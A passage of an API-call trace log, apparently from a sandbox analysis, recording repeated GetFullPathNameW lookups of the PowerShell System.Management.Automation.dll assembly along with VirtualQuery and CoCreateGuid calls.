	[0285.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.390] VirtualQuery (in: lpAddress=0x26bc50, lpBuffer=0x26cb10, dwLength=0x30 | out: lpBuffer=0x26cb10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.390] VirtualQuery (in: lpAddress=0x26bc50, lpBuffer=0x26cb10, dwLength=0x30 | out: lpBuffer=0x26cb10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.391] VirtualQuery (in: lpAddress=0x26b340, lpBuffer=0x26c200, dwLength=0x30 | out: lpBuffer=0x26c200*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.391] VirtualQuery (in: lpAddress=0x26b3d0, lpBuffer=0x26c290, dwLength=0x30 | out: lpBuffer=0x26c290*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.391] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.391] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.391] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.392] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.420] VirtualQuery (in: lpAddress=0x26b780, lpBuffer=0x26c640, dwLength=0x30 | out: lpBuffer=0x26c640*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.420] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.420] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.421] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.421] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.421] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x45e2d1ac, Data2=0xef2a, Data3=0x4567, Data4=([0]=0xa3, [1]=0x68, [2]=0x31, [3]=0xf2, [4]=0xa5, [5]=0xcf, [6]=0xab, [7]=0x3d))) returned 0x0
	[0286.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.425] VirtualQuery (in: lpAddress=0x26b340, lpBuffer=0x26c200, dwLength=0x30 | out: lpBuffer=0x26c200*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.425] VirtualQuery (in: lpAddress=0x26b3d0, lpBuffer=0x26c290, dwLength=0x30 | out: lpBuffer=0x26c290*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
